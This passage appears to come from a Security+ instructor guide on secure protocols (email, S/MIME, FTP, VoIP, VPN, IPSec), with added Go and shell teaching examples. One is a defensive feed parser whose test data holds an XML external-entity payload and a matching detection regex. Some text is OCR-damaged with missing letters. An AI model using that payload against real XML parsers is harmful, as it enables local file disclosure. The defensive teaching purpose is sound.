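		for _, m := range secretParam.FindAllStringSubmatch(line, -1) {
			value := m[2]
			keep := 3
			if len(value) < keep {
				keep = len(value)
			}
			leaks = append(leaks, Leak{
				Line:     n + 1,
				Param:    m[1],
				Redacted: value[:keep] + strings.Repeat("*", len(value)-keep),
			})
		}
	}
	return leaks
}

// NewAPIRequest builds the POST /api/users call from the text with the key in
// an Authorization header rather than the query string, so the URL that gets
// logged contains no secret.
func NewAPIRequest(base, apiKey string, body []byte) (*http.Request, error) {
	req, err := http.NewRequest("POST", base+"/api/users", bytes.NewReader(body))
	if err != nil {
		return nil, err
	}
	req.Header.Set("Authorization", "Bearer "+apiKey)
	req.Header.Set("Content-Type", "application/json")
	return req, nil
}

func main() {
	for _, l := range FindSecretsInURLs(sampleAccessLog) {
		fmt.Printf("line %d: parameter %q leaked in URL (value %s)\n", l.Line, l.Param, l.Redacted)
	}
	req, _ := NewAPIRequest("https://example.foo", "123456", []byte(`{"user":{"name":"James"}}`))
	fmt.Println("request URL:", req.URL.String(), "| query string empty:", req.URL.RawQuery == "")
}
```

The same scan is worth running over proxy and load-balancer logs, since those record the full URL too; moving the key into a header only helps if TLS terminates somewhere you control.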

Subscription Services
Show Slide(s): Subscription Services

Employees may require access to all kinds of subscription services. Some examples
include:
• Market and financial intelligence and information.

• Security threat intelligence and information.

• Reference and training materials in various formats (ebook and video, for instance).

• Software applications and cloud services paid for by subscription rather than
permanent licenses.

Most of this sort of content will be delivered by a secure web site or cloud application.
It may be necessary to provision authentication mechanisms for enterprise single sign-
on access to the services.
Another use of subscriptions is a web feed, where updated articles or news items
are pushed to the client or browser. Web feeds are based on either the Really Simple
Syndication (RSS) or Atom formats, both of which use XML to mark up each document
supplied by the feed. It is possible that such feeds may be vulnerable to XML injection
style attacks, allowing an attacker to show malicious links or even interact with the file
system (https://mikeknoop.com/lxml-xxe-exploit).

Subscription services may also describe the outsourcing of network and security
components and procedures. There may also be subscription use of enterprise cloud
applications, which may be mediated by an access broker.
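A feed is untrusted input from a third party, so the defensive move is to treat it that way before it reaches an XML parser. The following Go program is an added example, not the guide's own material: it refuses any feed document that carries a document type declaration or entity definition (a syndication feed has no legitimate use for either, and these are the constructs the file-system access in the cited post relies on) and only then decodes the items. Go's encoding/xml does not resolve DTD entities at all, so the gate is belt-and-braces here; it matters more in front of parsers that do. The two sample feeds, the feed URLs and the Item fields are constructed for the example.

```go
package main

import (
	"bytes"
	"encoding/xml"
	"errors"
	"fmt"
	"regexp"
)

// Item is the part of an RSS <item> this example keeps.
type Item struct {
	Title string `xml:"title"`
	Link  string `xml:"link"`
}

type rss struct {
	Items []Item `xml:"channel>item"`
}

// dtdMarker matches a document type declaration or an entity definition.
// Neither belongs in a feed, so their presence is treated as hostile input.
var dtdMarker = regexp.MustCompile(`(?i)<!(DOCTYPE|ENTITY)`)

var ErrDTD = errors.New("feed rejected: contains a DTD or entity declaration")

// ParseFeed rejects feeds that carry DTD constructs, then decodes the items
// with a strict parser so malformed documents fail instead of half-parsing.
func ParseFeed(data []byte) ([]Item, error) {
	if dtdMarker.Match(data) {
		return nil, ErrDTD
	}
	dec := xml.NewDecoder(bytes.NewReader(data))
	dec.Strict = true
	var doc rss
	if err := dec.Decode(&doc); err != nil {
		return nil, err
	}
	return doc.Items, nil
}

// Constructed sample feeds. The second declares an external entity, the
// pattern the text refers to; the path it names is a placeholder.
var benignFeed = []byte(`<?xml version="1.0"?>
<rss version="2.0"><channel><title>Threat intel</title>
<item><title>Advisory 1</title><link>https://feed.example/1</link></item>
<item><title>Advisory 2</title><link>https://feed.example/2</link></item>
</channel></rss>`)

var hostileFeed = []byte(`<?xml version="1.0"?>
<!DOCTYPE rss [<!ENTITY ext SYSTEM "file:///placeholder/local/file">]>
<rss version="2.0"><channel><title>x</title>
<item><title>&ext;</title><link>https://feed.example/evil</link></item>
</channel></rss>`)

func main() {
	items, err := ParseFeed(benignFeed)
	fmt.Println("benign feed:", len(items), "items, err =", err)
	_, err = ParseFeed(hostileFeed)
	fmt.Println("hostile feed: err =", err)
}
```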

File Transfer Services
Show Slide(s): File Transfer Services

There are many means of transferring files across networks. A network operating
system can host shared folders and files, enabling them to be copied or accessed over
the local network or via remote access (over a VPN, for instance). Email and messaging
apps can send files as attachments. HTTP supports file download (and uploads via
various scripting mechanisms). There are also peer-to-peer file sharing services.
Despite the availability of these newer protocols and services, the file transfer protocol
(FTP) remains very popular because it is efficient and has wide cross-platform support.

Teaching Tip: Make sure students know the differences between FTP, SFTP, and FTPS,
including which ports are associated with which variant.

File Transfer Protocol
A File Transfer Protocol (FTP) server is typically configured with several public
directories, hosting files, and user accounts. Most HTTP servers also function as FTP
servers, and FTP services, accounts, and directories may be installed and enabled
by default when you install a web server. FTP is more efficient compared to file
attachments or HTTP file transfer, but has no security mechanisms. All authentication
and data transfer are communicated as plain text, meaning that credentials can easily
be picked out of any intercepted FTP traffic.

You should check that users do not install unauthorized servers on their PCs (a rogue
server). For example, a version of IIS that includes HTTP, FTP, and SMTP servers is shipped
with client versions of Windows, though it is not installed by default.

SSH FTP (SFTP) and FTP Over SSL (FTPS)
SSH FTP (SFTP) addresses the privacy and integrity issues of FTP by encrypting the
authentication and data transfer between client and server. In SFTP, a secure link
is created between the client and server using Secure Shell (SSH) over TCP port 22.
Ordinary FTP commands and data transfer can then be sent over the secure link
without risk of eavesdropping or man-in-the-middle attacks. This solution requires an
SSH server that supports SFTP and SFTP client software.
Another means of securing FTP is to use the connection security protocol SSL/TLS.
There are two means of doing this:
• Explicit TLS (FTPES): use the AUTH TLS command to upgrade an unsecure
connection established over port 21 to a secure one. This protects authentication
credentials. The data connection for the actual file transfers can also be encrypted
(using the PROT command).

• Implicit TLS (FTPS): negotiate an SSL/TLS tunnel before the exchange of any FTP
commands. This mode uses the secure port 990 for the control connection.

FTPS is tricky to configure when there are firewalls between the client and server.
Consequently, SFTP is usually the preferred method.

Show Slide(s): Email Services

Email Services
Email services use two types of protocols:
• The Simple Mail Transfer Protocol (SMTP) specifies how mail is sent from one
system to another.

• A mailbox protocol stores messages for users and allows them to download them to
client computers or manage them on the server.

Teaching Tip: Make sure students understand the difference between mail transfer and
mailbox access.

Secure SMTP (SMTPS)
To deliver a message, the SMTP server of the sender discovers the IP address of the
recipient SMTP server using the domain name part of the email address. The SMTP
server for the domain is registered in DNS using a Mail Exchanger (MX) record.
SMTP communications can be secured using TLS. This works much like HTTPS with a
certificate on the SMTP server. There are two ways for SMTP to use TLS:
• STARTTLS: this is a command that upgrades an existing unsecure connection to use
TLS. This is also referred to as explicit TLS or opportunistic TLS.

• SMTPS: this establishes the secure connection before any SMTP commands (HELO,
for instance) are exchanged. This is also referred to as implicit TLS.

The STARTTLS method is generally more widely implemented than SMTPS. Typical
SMTP configurations use the following ports and secure services:
• Port 25: used for message relay (between SMTP servers or Message Transfer
Agents [MTA]). If security is required and supported by both servers, the STARTTLS
command can be used to set up the secure connection.

• Port 587: used by mail clients (Message Submission Agents [MSA]) to submit
messages for delivery by an SMTP server. Servers configured to support port 587
should use STARTTLS and require authentication before message submission.

• Port 465: some providers and mail clients use this port for message submission
over implicit TLS (SMTPS), though this usage is now deprecated by standards
documentation.

Secure POP (POP3S)
The Post Office Protocol v3 (POP3) is a mailbox protocol designed to store the
messages delivered by SMTP on a server. When the client connects to the mailbox,
POP3 downloads the messages to the recipient's email client.

Configuring mailbox access protocols on a server.

A POP3 client application, such as Microsoft Outlook or Mozilla Thunderbird,
establishes a TCP connection to the POP3 server over port 110. The user is
authenticated (by username and password) and the contents of his or her mailbox
are downloaded for processing on the local PC. POP3S is the secured version of the
protocol, operating over TCP port 995 by default.

Secure IMAP (IMAPS)
Compared to POP3, the Internet Message Access Protocol v4 (IMAP4) supports
permanent connections to a server and connecting multiple clients to the same
mailbox simultaneously. It also allows a client to manage mail folders on the server.
Clients connect to IMAP over TCP port 143. They authenticate themselves then retrieve
messages from the designated folders. As with other email protocols, the connection can
be secured by establishing an SSL/TLS tunnel. The default port for IMAPS is TCP port 993.

Secure Multipurpose Internet Mail Extensions
Show Slide(s): Secure Multipurpose Internet Mail Extensions

Connection security goes a long way toward preventing the compromise of email
accounts and the spoofing of email, but end-to-end encryption cannot usually be
guaranteed. Consequently, there is still a need for authentication and confidentiality
to be applied on a per-message basis. One means of doing this is called Secure/
Multipurpose Internet Mail Extensions (S/MIME). To use S/MIME, the user is issued a
digital certificate containing his or her public key, signed by a CA to establish its validity.
The public key is a pair with a private key kept secret by the user. To establish the
exchange of secure emails, both users must be using S/MIME and exchange certificates:

Teaching Tip: Stress the difference between providing secure ports for accessing SMTP
and mailbox profiles with the use of S/MIME to authenticate senders and encrypt
messages. You might also want to mention policy-based encryption. This requires the
use of S/MIME if there are matches to keywords in a certain message. If the recipient is
unknown (external to the organization), the message is held until a certificate has been
issued to them (knowledge.broadcom.com/external/article define-a-policy-based-
encryption-essenti.html).

1. Alice sends Bob her digital certificate, containing her public key and validated
digital ID (an email address). She signs this message using her private key.
2. Bob uses the public key in the certificate to decode her signature and the
signature of the CA (or chain of CAs) validating her digital certificate and digital ID
and decides that he can trust Alice and her email address.
3. He responds with his digital certificate and public key and Alice, following the
same process, decides to trust Bob.
4. Both Alice and Bob now have one another's certificates in their trusted certificate
stores.
5. When Alice wants to send Bob a confidential message, she makes a hash of
the message and signs the hash using her private key. She then encrypts the
message, hash, and her public key using Bob's public key and sends a message to
Bob with this data as an S/MIME attachment.
6. Bob receives the message and decrypts the attachment using his private key.
He validates the signature and the integrity of the message by decrypting it with
Alice's public key and comparing her hash value with one he makes himself.
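Steps 5 and 6 above, carried out with real primitives, as an added example that is not part of the guide and is not an S/MIME implementation: the Go standard library is used to sign SHA-256(message) with Alice's private key (RSA-PSS), encrypt message and signature under a fresh AES-256-GCM session key, and wrap that session key with Bob's public key (RSA-OAEP), which is the hybrid construction review question 5 in this topic describes. Bob unwraps, decrypts, and verifies; a forged sender, a wrong recipient, or a modified attachment each fail loudly. Steps 1 to 4 (the certificate exchange) are assumed to have happened, so each side simply holds the other's public key; the Party and Envelope types and the message text are constructed for this example.

```go
package main

import (
	"crypto"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Party is one S/MIME user. The CA-signed certificate of steps 1-4 is assumed
// already exchanged; only the key pair is modelled here.
type Party struct {
	Name string
	Priv *rsa.PrivateKey
}

func NewParty(name string) (*Party, error) {
	k, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return nil, err
	}
	return &Party{Name: name, Priv: k}, nil
}

// Envelope stands in for the S/MIME attachment of step 5.
type Envelope struct {
	WrappedKey []byte // AES-256 session key encrypted to the recipient's public key (RSA-OAEP)
	Nonce      []byte
	Ciphertext []byte // AES-GCM over (message || RSA-PSS signature of SHA-256(message))
}

// Seal is step 5: hash and sign with the sender's private key, then encrypt
// message and signature under a session key only the recipient can unwrap.
func Seal(sender *Party, recipient *rsa.PublicKey, msg []byte) (*Envelope, error) {
	digest := sha256.Sum256(msg)
	sig, err := rsa.SignPSS(rand.Reader, sender.Priv, crypto.SHA256, digest[:], nil)
	if err != nil {
		return nil, err
	}
	sessionKey, nonce := make([]byte, 32), make([]byte, 12)
	if _, err := rand.Read(sessionKey); err != nil {
		return nil, err
	}
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	gcm, err := newGCM(sessionKey)
	if err != nil {
		return nil, err
	}
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, recipient, sessionKey, nil)
	if err != nil {
		return nil, err
	}
	plain := append(append([]byte{}, msg...), sig...)
	return &Envelope{WrappedKey: wrapped, Nonce: nonce, Ciphertext: gcm.Seal(nil, nonce, plain, nil)}, nil
}

// Open is step 6: unwrap the session key with the recipient's private key,
// decrypt, then verify the signature against the sender's public key by
// recomputing the hash. Nothing is returned until every check passes.
func Open(recipient *Party, sender *rsa.PublicKey, env *Envelope) ([]byte, error) {
	sessionKey, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, recipient.Priv, env.WrappedKey, nil)
	if err != nil {
		return nil, errors.New("session key unwrap failed: not addressed to this private key")
	}
	gcm, err := newGCM(sessionKey)
	if err != nil {
		return nil, err
	}
	plain, err := gcm.Open(nil, env.Nonce, env.Ciphertext, nil)
	if err != nil {
		return nil, errors.New("attachment tampered with or wrong key")
	}
	sigLen := sender.Size()
	if len(plain) < sigLen {
		return nil, errors.New("attachment too short to carry a signature")
	}
	msg, sig := plain[:len(plain)-sigLen], plain[len(plain)-sigLen:]
	digest := sha256.Sum256(msg)
	if err := rsa.VerifyPSS(sender, crypto.SHA256, digest[:], sig, nil); err != nil {
		return nil, errors.New("signature does not verify against the claimed sender")
	}
	return msg, nil
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

func main() {
	alice, _ := NewParty("Alice")
	bob, _ := NewParty("Bob")
	env, _ := Seal(alice, &bob.Priv.PublicKey, []byte("constructed confidential message"))
	msg, err := Open(bob, &alice.Priv.PublicKey, env)
	fmt.Printf("Bob reads %q (err=%v)\n", msg, err)
}
```

The order matters: the signature is made over the plaintext and then encrypted along with it, so only Bob can even see who signed, and Bob verifies before trusting the content. Real S/MIME wraps the same pieces in CMS structures and carries certificates instead of bare keys.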

Show Slide(s): Voice and Video Services

Voice and Video Services
Voice over IP (VoIP), web conferencing, and video teleconferencing (VTC) solutions
have become standard methods for the provision of business communications. The
main challenges that these applications have in common is that they transfer real-time
data and must create point-to-point links between hosts on different networks.
Implementing Internet telephony and video conferencing brings its own raft of security
concerns. Each part of the communications media network infrastructure needs to be
evaluated for threats and vulnerabilities. This includes protocols, servers, handsets,
and software. The protocols designed to support real-time services cover one or more
of the following functions:
• Session control: used to establish, manage, and disestablish communications
sessions. They handle tasks such as user discovery (locating a user on the network),
availability advertising (whether a user is prepared to receive calls), negotiating session
parameters (such as use of audio/video), and session management and termination.

• Data transport: handles the delivery of the actual video or voice information.

• Quality of Service (QoS): provides information about the connection to a QoS
system, which in turn ensures that voice or video communications are free from
problems such as dropped packets, delay, or jitter.

The Session Initiation Protocol (SIP) is one of the most widely used session control
protocols. SIP endpoints are the end-user devices (also known as user agents), such
as IP-enabled handsets or client and server web conference software. Each device,
conference, or telephony user is assigned a unique SIP address known as a SIP Uniform
Resource Indicator (URI), such as sip:[email protected]
SIP endpoints can establish communications directly in a peer-to-peer architecture,
but it is more typical to use intermediary servers and directory servers. A SIP network
may also use gateways and private branch exchange (PBX) appliances to provide an
interface between the VoIP network and external telephone and cellular networks.
While SIP provides session management features, the actual delivery of real-time data
uses different protocols. The principal one is Real-time Transport Protocol (RTP).
A threat actor could exploit unencrypted voice and video commun;ications to try
to intercept passwords, credit card details, and so on. Without strong mutual
authentication, connections are also vulnerable to man-in-the-middle attacks.

Teaching Tip: This is a section where hands-on activity is difficult to implement, so
encourage students to read vendor implementation guides. Stress that encrypting SIP
only will not encrypt the actual call data.

Enabling SIP TLS security on a 3CX PBX VoIP softphone. (Screenshot used with permission from 3CX.)

Connection security for voice and video works in a similar manner to HTTPS. To initiate
the call, the secure version SIPS uses digital certificates to authenticate the endpoints
and establish a TLS tunnel. Where unencrypted SIP typically runs over TCP port 5060,
SIPS uses TCP port 5061. The secure connection established by SIPS can also be used
to generate a master key to use with the secure version of the transport protocol
(SRTP). SRTP provides confidentiality for the actual call data.

Enforcing RTP protocol encryption on a Mitel PBX system. (Screenshot used with permission from Mitel.)

Review Activity:
Secure Application Protocols
Answer the following questions:

1. What type of attack against HTTPS aims to force the server to negotiate
weak ciphers?

A downgrade attack.

2. A client and server have agreed on the use of the cipher suite ECDHE-ECDSA-
AES256-GCM-SHA384 for a TLS session. What is the key strength of the
symmetric encryption algorithm?

256-bit AES.

3. What security protocol does SFTP use to protect the connection and which
port does an SFTP server listen on by default?

Secure Shell (SSH) over TCP port 22.

4. Which port(s) and security methods should be used by a mail client to
submit messages for delivery by an SMTP server?

Port 587 with STARTTLS (explicit TLS) or port 465 with implicit TLS.

5. When using S/MIME, which key is used to encrypt a message?

The recipient's public key (principally). The public key is used to encrypt a symmetric
session key and (for performance reasons) the session key does the actual data
encoding. The session key and, therefore, the message text can then only be recovered
by the recipient, who uses the linked private key to decrypt it.

6. Which protocol protects the contents of a VoIP conversation from
eavesdropping?

Encrypted VoIP data is carried over the Secure Real-time Transport Protocol (SRTP).

esson 11 Implementing Secure etwork Protocols | Topic 11

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 301

Topic 11C
Implement Secure Remote
Access rotocols

EXAM OBJECTIVES COVERED Teaching


3.1 Given a scenario, implement secure protocols Tip
3.3 Given a scenario, implement secure network designs tudents can find N
.1 Given a scenario, use the appropriate tool to assess organizational security (SS only) and I ec concepts
challenging, so
allocate plenty of time
ith today's mobile workforce, most networks have to support connections by remote to this topic.
employees, contractors, and customers to their network resources. These remote
connections often make use of untrusted public networks, such as the Internet.
Conse uently, understanding how to implement secure remote access protocols will
be a ma or part of your ob as an information security professional.
There are also many cases where a user needs to remotely access an individual host.
This is most commonly implemented to allow administrators to perform remote
management of workstations, servers, and network appliances, but it can also be used
to provide ordinary users access to a desktop as well.

Remote Access Architecture

Show Slide(s): Remote Access Architecture

Remote access means that the user's device does not make a direct cabled or wireless connection to the network. The connection occurs over or through an intermediate network. Historically, remote access might have used analog modems connecting over the telephone system or possibly a private link (a leased line). These days, most remote access is implemented as a virtual private network (VPN), running over the Internet.

Administering remote access involves essentially the same tasks as administering the local network. Only authorized users should be allowed access to local network resources and communication channels. Additional complexity comes about because it can be more difficult to ensure the security of remote workstations and servers and there is greater opportunity for remote logins to be exploited.

Teaching Tip: According to some definitions, a VPN need not be secure. However, this is what most people understand as a VPN these days.

With a remote access VPN, clients connect to a VPN gateway on the edge of the private network. This is the telecommuter model, allowing home workers and employees working in the field to connect to the corporate network. The VPN protocol establishes a secure tunnel so that the contents are kept private, even when the packets pass over ISPs' routers.


Remote access VPN. (Images © 123RF.com.)

A VPN can also be deployed in a site-to-site model to connect two or more private networks. Where remote access VPN connections are typically initiated by the client, a site-to-site VPN is configured to operate automatically. The gateways exchange security information using whichever protocol the VPN is based on. This establishes a trust relationship between the gateways and sets up a secure connection through which to tunnel data. Hosts at each site do not need to be configured with any information about the VPN. The routing infrastructure at each site determines whether to deliver traffic locally or send it over the VPN tunnel.

Site-to-site VPN. (Images © 123RF.com.)


Transport Layer Security VPN

Show Slide(s): Transport Layer Security VPN

Several VPN protocols have been used over the years. Legacy protocols such as the Point-to-Point Tunneling Protocol (PPTP) have been deprecated because they do not offer adequate security. Transport Layer Security (TLS) and IPSec are now the preferred options for configuring VPN access.

Teaching Tip: Explain that the important point about modern VPNs is to hide any authentication information from eavesdroppers. Protocols such as PPTP do not protect the hash exchanged during the CHAP/MS-CHAP handshake, making the connection extremely vulnerable to offline cracking attempts.

Configuring an OpenVPN server in the pfSense security appliance. (Screenshot used with permission from Rubicon Communications, LLC.)

A TLS VPN (still more commonly referred to as an SSL VPN) requires a remote access server listening on port 443 (or any arbitrary port number). The client makes a connection to the server using TLS so that the server is authenticated to the client (and optionally the client's certificate must be authenticated by the server). This creates an encrypted tunnel for the user to submit authentication credentials, which would normally be processed by a RADIUS server. Once the user is authenticated and the connection fully established, the VPN gateway tunnels all communications for the local network over the secure socket.


Configuring a client certificate for mutual authentication in the pfSense security appliance. (Screenshot used with permission from Rubicon Communications, LLC.)

The port can be either TCP or UDP. UDP might be chosen for marginally superior performance, especially when tunneling latency-sensitive traffic such as voice or video. TCP might be easier to use with a default firewall policy. TLS over UDP is also referred to as Datagram TLS (DTLS).

OpenVPN is an open source example of a TLS VPN (openvpn.net). OpenVPN can work in TAP (bridged) mode to tunnel layer 2 frames or in TUN (routed) mode to forward IP packets. Another option is Microsoft's Secure Sockets Tunneling Protocol (SSTP), which works by tunneling Point-to-Point Protocol (PPP) layer 2 frames over a TLS session (docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sstp). The Point-to-Point Protocol (PPP) is a widely used remote dial-in protocol. It provides encapsulation for IP traffic plus IP address assignment and authentication via the widely supported Challenge Handshake Authentication Protocol (CHAP).

Internet Protocol Security

Show Slide(s): Internet Protocol Security

Teaching Tip: Point out that IPSec is an integral part of IPv6. Its use with IPv4 is a stop-gap until Internet infrastructure finally switches over to IPv6 (the world's largest software upgrade). Note that AH provides only authentication and integrity, not confidentiality. Note also that only immutable fields in the IP header are used in the ICV. The TTL field is excluded, for instance.

Transport Layer Security is applied at the application level, either by using a separate secure port or by using commands in the application protocol to negotiate a secure connection. Internet Protocol Security (IPSec) operates at the network layer (layer 3) of the OSI model, so it can be implemented without having to configure specific application support. IPSec can provide both confidentiality (by encrypting data packets) and integrity/anti-replay (by signing each packet). The main drawback is that it adds overhead to data communications. IPSec can be used to secure communications on local networks and as a remote access protocol.


When IPv6 was being drafted, IPSec was considered a mandatory component as it was felt that all traffic over the new protocol should be secure. In recent years, RFCs have been revised so that now, IPSec is recommended for IPv6 but no longer mandatory (tools.ietf.org/html/rfc6 page-1).

Each host that uses IPSec must be assigned a policy. An IPSec policy sets the authentication mechanism and also the protocols and mode for the connection. Hosts must share at least one matching security method for a connection to be established. There are two core protocols in IPSec, which can be applied singly or together, depending on the policy.

Authentication Header (AH)

The Authentication Header (AH) protocol performs a cryptographic hash on the whole packet, including the IP header, plus a shared secret key (known only to the communicating hosts), and adds this MAC in its header as an Integrity Check Value (ICV). The recipient performs the same function on the packet and key and should derive the same value to confirm that the packet has not been modified. The payload is not encrypted so this protocol does not provide confidentiality. Also, the inclusion of IP header fields in the ICV means that the check will fail across NAT gateways, where the IP address is rewritten. Consequently, AH is not often used.

IPSec datagram using AH. The integrity of the payload and IP header is ensured by the Integrity Check Value (ICV), but the payload is not encrypted.

Encapsulation Security Payload (ESP)

Encapsulation Security Payload (ESP) provides confidentiality and/or authentication and integrity. It can be used to encrypt the packet rather than simply calculating a MAC. ESP attaches three fields to the packet: a header, a trailer (providing padding for the cryptographic function), and an Integrity Check Value. Unlike AH, ESP excludes the IP header when calculating the ICV.

IPSec datagram using ESP. The TCP header and payload from the original packet are encapsulated within ESP and encrypted to provide confidentiality.

With ESP, algorithms for both confidentiality (symmetric cipher) and authentication/integrity (hash function) are usually applied together. It is possible to use one or the other, however.
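The difference in what AH and ESP cover with their ICV, and why the AH check fails behind NAT, can be seen in a short shell script. This is an added example, not code from the CompTIA guide: it models the two integrity checks with an HMAC over constructed packet fields (the shared key, addresses, SPI, and payload are all made up) and shows a NAT rewrite breaking the AH check but not the ESP check, while a change to the protected payload is still caught by ESP.

```sh
#!/bin/sh
# Added example (not from the CompTIA guide): models the AH and ESP Integrity
# Check Value (ICV) with an HMAC over toy packet fields, to show why an AH
# check fails when a NAT gateway rewrites the source address while an ESP
# check does not.  Real IPsec computes the ICV over the actual header bytes
# with the algorithm negotiated by IKE; the field layout here is constructed.

SHARED_KEY="constructed-sa-key-not-real"   # the SA's shared secret (constructed)

# Keyed digest of stdin, hex only.  Uses HMAC-SHA256 via openssl; falls back to
# a toy prefix-keyed SHA-256 (not a real HMAC) if openssl is absent.
keyed_digest() {
    if command -v openssl >/dev/null 2>&1; then
        openssl dgst -sha256 -hmac "$SHARED_KEY" | sed 's/^.*= *//'
    else
        { printf '%s|' "$SHARED_KEY"; cat; } | sha256sum | cut -d' ' -f1
    fi
}

# AH: the ICV covers the immutable IP header fields (addresses, protocol)
# plus the whole payload.  Mutable fields such as TTL are left out, which is
# why they are not part of the input.  $1=src IP  $2=dst IP  $3=payload
ah_icv() {
    printf 'src=%s dst=%s proto=TCP|%s' "$1" "$2" "$3" | keyed_digest
}

# ESP: the ICV covers the ESP header (SPI, sequence number), the encrypted
# payload and the trailer, but not the outer IP header.  $1=SPI $2=seq $3=payload
esp_icv() {
    printf 'spi=%s seq=%s|%s' "$1" "$2" "$3" | keyed_digest
}

# Receiver-side checks: success (0) when the recomputed ICV equals the one
# carried in the packet.
verify_ah()  { [ "$1" = "$(ah_icv "$2" "$3" "$4")" ]; }
verify_esp() { [ "$1" = "$(esp_icv "$2" "$3" "$4")" ]; }

# Scenario (constructed): 192.168.1.10 sends to 203.0.113.5; a NAT gateway on
# the path rewrites the source address to 198.51.100.1.
ORIG_SRC=192.168.1.10
NAT_SRC=198.51.100.1
DST=203.0.113.5
PAYLOAD="GET /index.html"

# AH after NAT: the sender computed the ICV over 192.168.1.10, the receiver
# sees 198.51.100.1, so the check fails.  Prints pass or fail.
ah_after_nat() {
    icv=$(ah_icv "$ORIG_SRC" "$DST" "$PAYLOAD")
    if verify_ah "$icv" "$NAT_SRC" "$DST" "$PAYLOAD"; then echo pass; else echo fail; fi
}

# ESP after NAT: the IP header is outside the ICV, so the rewrite is harmless.
esp_after_nat() {
    icv=$(esp_icv 0x1000 1 "$PAYLOAD")
    if verify_esp "$icv" 0x1000 1 "$PAYLOAD"; then echo pass; else echo fail; fi
}

# ESP still detects modification of the protected part of the packet.
esp_tampered() {
    icv=$(esp_icv 0x1000 1 "$PAYLOAD")
    if verify_esp "$icv" 0x1000 1 "GET /admin"; then echo pass; else echo fail; fi
}

echo "AH across NAT:  $(ah_after_nat)"    # fail
echo "ESP across NAT: $(esp_after_nat)"   # pass
echo "ESP tampered:   $(esp_tampered)"    # fail
```

Run it with sh; the HMAC is computed by openssl when it is installed. The same reasoning explains why IKE's NAT traversal (covered later in this topic) wraps ESP in UDP rather than trying to make AH survive address rewriting.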


IPSec Transport and Tunnel Modes

Show Slide(s): IPSec Transport and Tunnel Modes

Teaching Tip: Make sure students are clear about the uses of transport and tunnel mode and the role of ESP and AH in either.

IPSec can be used in two modes:

• Transport mode: this mode is used to secure communications between hosts on a private network (an end-to-end implementation). When ESP is applied in transport mode, the IP header for each packet is not encrypted, just the payload data. If AH is used in transport mode, it can provide integrity for the IP header.

IPSec datagram using AH and ESP in transport mode.

• Tunnel mode: this mode is used for communications between VPN gateways across an unsecure network (creating a VPN). This is also referred to as a router implementation. With ESP, the whole IP packet (header and payload) is encrypted and encapsulated as a datagram with a new IP header. AH has no real use case in tunnel mode, as confidentiality will usually be required.

IPSec datagram using ESP in tunnel mode.

Configuring an IPSec tunnel with ESP encryption in the pfSense security appliance. (Screenshot used with permission from Rubicon Communications, LLC.)


The principles underlying IPSec are the same for IPv4 and IPv6, but the header formats are different. IPSec makes use of extension headers in IPv6 while in IPv4, ESP and AH are allocated new IP protocol numbers (50 and 51), and either modify the original IP header or encapsulate the original packet, depending on whether transport or tunnel mode is used.

Internet Key Exchange

Show Slide(s): Internet Key Exchange

Teaching Tip: Explain how IKE provides a connection and authentication mechanism for IPSec.

IPSec's encryption and hashing functions depend on a shared secret. The secret must be communicated to both hosts and the hosts must confirm one another's identity (mutual authentication). Otherwise, the connection is vulnerable to man-in-the-middle and spoofing attacks. The Internet Key Exchange (IKE) protocol handles authentication and key exchange, referred to as Security Associations (SA).

Configuring IKE in the pfSense security appliance. (Screenshot used with permission from Rubicon Communications, LLC.)

IKE negotiations take place over two phases:

1. Phase I establishes the identity of the two hosts and performs key agreement using the Diffie-Hellman algorithm to create a secure channel. Two methods of authenticating hosts are commonly used:

• Digital certificates: the hosts use certificates issued by a mutually trusted certificate authority to identify one another.

• Pre-shared key (group authentication): the same passphrase is configured on both hosts.

2. Phase II uses the secure channel created in Phase I to establish which ciphers and key sizes will be used with AH and/or ESP in the IPSec session.


Layer 2 Tunneling Protocol and IKE v2

Show Slide(s): Layer 2 Tunneling Protocol and IKE v2

Teaching Tip: Note that the first version of IKE was relatively difficult to configure as a client authentication mechanism for Windows hosts, so the combination of L2TP and IPSec was commonly used. Make sure students understand why CHAP cannot be used with a secure tunnel (and consequently why PPTP is now defunct). IKE v2 is now better supported.

This first version of IKE is optimized to ensure the mutual authentication of two peer hosts, such as in a site-to-site VPN. On its own, it does not provide a simple means for a client user account to authenticate to a remote network directory. Consequently, for remote access VPNs, a combination of IPSec with the Layer 2 Tunneling Protocol (L2TP) VPN protocol is often used.

Layer 2 Tunneling Protocol/IPSec VPN

A L2TP/IPSec VPN would typically operate as follows:

1. The client and VPN gateway set up a secure IPSec channel over the Internet, using either a pre-shared key or certificates for IKE.

2. The VPN gateway uses L2TP to set up a tunnel to exchange local network data encapsulated as Point-to-Point Protocol (PPP) frames. This double encapsulation of traffic is the main drawback, as it adds overhead.

3. The user authenticates over the PPP session using EAP or CHAP.

IKE v2

The drawbacks of the original version of IKE were addressed by an updated protocol. IKE v2 has some additional features that have made the protocol popular for use as a standalone remote access VPN solution. The main changes are:

• Support for EAP authentication methods, allowing, for example, user authentication against a RADIUS server.

• Simplified connection set up: IKE v2 specifies a single 4-message setup mode, reducing bandwidth without compromising security.

• Reliability: IKE v2 allows NAT traversal and MOBIKE multihoming. Multihoming means that a client such as a smartphone with multiple interfaces (such as Wi-Fi and cellular) can keep the IPSec connection alive when switching between them.

Compared to L2TP/IPSec, using IKE v2 is more efficient. This solution is becoming much better supported, with native support in Windows, for instance.

Client Configuration

Show Slide(s): VPN Client Configuration

Teaching Tip: Note that Windows has native support for IKE v2, L2TP/IPSec, SSTP, and PPTP (though no one should be using PPTP at this point).

To configure a VPN client, you may need to install the client software if the VPN type is not natively supported by the OS. For example, OpenVPN requires client installation. You then configure the client with the address of the VPN gateway, the VPN protocol type (if it cannot autodetect it), the username, and the account credentials. You may also need to deploy a client certificate that is trusted by the VPN concentrator to the machine and make that available to the VPN client. In addition, you might need to configure settings for how the VPN connection operates.

Always-On VPN

